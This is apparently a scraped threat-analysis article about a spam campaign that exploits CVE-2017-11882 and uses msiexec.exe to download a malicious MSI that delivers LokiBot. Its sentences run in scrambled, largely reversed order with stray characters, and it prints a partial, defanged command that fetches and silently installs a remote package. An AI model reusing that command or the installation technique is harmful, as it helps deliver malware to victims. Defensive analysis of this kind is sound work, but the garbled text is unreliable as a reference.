![]() Malware has never really needed to install itself through an MSI package. This method uses an MSI package that msiexec.exe recognizes as an installation package, thereby using Windows Installer as intended. Another key difference is that when Andromeda downloads its payloads and updates, it immediately downloads and executes a PE file. In Andromeda’s case, code is injected to msiexec.exe to download updates and download the payloads. While other existing malware families use msiexec.exe, such as the Andromeda botnet (Detected by Trend Micro as ANDROM family), the difference is in how this method uses the installer. However, the use of msiexec.exe to download a malicious MSI package is not something we typically see in most malware. Due to their widespread use, it became easy to stop the arrival of threats via these software. Security software has become proficient at monitoring possible downloader processes such as Wscript, Powershell, Mshta.exe, Winword.exe, and other similar executables that have become increasingly popular methods of installing malicious payload. Why does it use a new installation method? The malware sample we identified as a LokiBot variant However, it is modular enough to deliver other payloads.įigure 7. So far, we have seen this technique used to deliver a sample we detected as LokiBot (TROJ_LOKI.SMA). Hollowed out instance of MSIL debugger view ![]() This instance will be hollowed out and replaced with the malware payload.įigure 6. The binary launches another randomly-named instance of itself. While this is relatively simple, being able to detect and identify the actual payload might be more difficult since it is contained in the heavily obfuscated MSIL or Delphi binary. One notable aspect of the package is that it provides a compression layer that file scan engines need to process and enumerate in order to detect the file as malicious. Depending on the MSI package downloaded, it may contain either a heavily obfuscated Microsoft Intermediate Language (MSIL) or Delphi binary file, which then acts as a loader for the actual payload. Once downloaded, Windows Installer ( msiexec.exe) will proceed to install an MSIL or Delphi binary to the system. msiexec.exe gives the binary the file name MSIFD83.tmp The exploitation of this vulnerability leads to the download and installation of a malicious MSI package labeled zus.msi via Windows Installer through the following command line:Ĭall cmd.exe /c msiexec /q /I “hxxps// Spam email containing the document file used to exploit CVE-2017-11882įigure 3. However, the attachment is actually used to exploit CVE-2017-11882.įigure 2. The email also contains an attached document file labeled “Payment copy.Doc” (Detected by Trend Micro as TROJ_CVE201711882.SM) which is supposedly a payment confirmation document. The email contains text written in Korean, which is roughly translated as “ hello, please check if your PC may be infected by virus or malicious codes,” apparently to warn the recipient about possible infections. It starts off with an email that asks the recipient to confirm a payment they made to the sender. The samples we analyzed seem to be part of a malware spam campaign. This attack uses msiexec.exe as part of the Windows Installer service. This differs from previous malware that exploited the vulnerability using the Windows executable mshta.exe to run a Powershell script, which is used to download and execute the payload. ![]() Recently, we discovered CVE-2017-11882 being exploited again in an attack that uses an uncommon method of installation-via the Windows Installer service in Microsoft Windows operating systems. However, this didn’t prevent cybercrime groups such as Cobalt from exploiting this vulnerability in order to deliver a variety of malware, including FAREIT, Ursnif, and a cracked version of the Loki infostealer, a keylogger that was primarily advertised as capable of stealing passwords and cryptocurrency wallets. ![]() Back in November 2017, Microsoft patched CVE-2017-11882, a remote code execution vulnerability that affected Microsoft Office. ![]()
0 Comments
Leave a Reply. |